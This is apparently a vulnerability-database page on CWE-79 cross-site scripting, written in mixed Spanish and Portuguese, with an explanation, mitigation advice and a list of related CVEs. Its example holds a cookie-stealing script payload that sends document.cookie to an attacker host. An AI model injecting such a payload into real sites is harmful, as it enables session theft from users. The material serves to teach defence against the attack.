Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-23187MEDIUMContent-ID based embedding of resources in E-Mails could be abused to trigger client-side script code when using the "show more" option. AttEPSS 0.5%CVE-2025-34305MEDIUMIPFire < v2.29 Stored XSS via Multiple Methods in cleanhtml()EPSS 0.5%CVE-2023-3554LOWGZ Scripts GZ Forum Script preview.php cross site scriptingEPSS 0.5%CVE-2025-34316MEDIUMIPFire < v2.29 Stored XSS via Mail Server SettingsEPSS 0.5%CVE-2024-1265LOWCodeAstro University Management System Attendance Management att_add.php cross site scriptingEPSS 0.5%CVE-2022-27503—Cross-site Scripting (XSS) vulnerability in Citrix StoreFront affects version 1912 before CU5 and version 3.12 before CU9EPSS 0.5%CVE-2026-48015MEDIUMShopware: Stored XSS via SVG file upload — no SVG sanitizationEPSS 0.5%CVE-2025-34315MEDIUMIPFire < v2.29 Stored XSS via Remote Syslog Server AddressEPSS 0.5%CVE-2022-20663MEDIUMSecure Network Analytics Cross-Site Scripting VulnerabilityEPSS 0.5%CVE-2025-34313MEDIUMIPFire < v2.29 Stored XSS via User Quota Rule URL FilterEPSS 0.5%CVE-2024-30889MEDIUMCross Site Scripting vulnerability in audimex audimexEE v.15.1.2 and fixed in 15.1.3.9 allows a remote attacker to execute arbitrary code viEPSS 0.5%CVE-2024-12395MEDIUMWooCommerce Additional Fees On Checkout (Free) <= 1.4.7 - Reflected Cross-Site Scripting via 'number'EPSS 0.5%CVE-2025-34314MEDIUMIPFire < v2.29 Stored XSS via Time Constraint Rule URL FilterEPSS 0.5%CVE-2022-23475HIGHdalorRadius full account take overEPSS 0.5%CVE-2024-11675MEDIUMCodeAstro Hospital Management System Add Patient Details Page his_admin_register_patient.php cross site scriptingEPSS 0.5%CVE-2023-31177MEDIUMImproper neutralizataion of input could lead to execution of arbitrary codeEPSS 0.5%CVE-2024-1749LOWBdtask Bhojon Best Restaurant Management Software Message Page message cross site scriptingEPSS 0.5%CVE-2023-3555LOWGZ Scripts PHP Vacation Rental Script preview.php cross site scriptingEPSS 0.5%CVE-2025-57202MEDIUMA stored cross-site scripting (XSS) vulnerability in the PwdGrp.cgi endpoint of AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1EPSS 0.5%CVE-2022-29811MEDIUMIn JetBrains Hub before 2022.1.14638 stored XSS via project icon was possible.EPSS 0.5%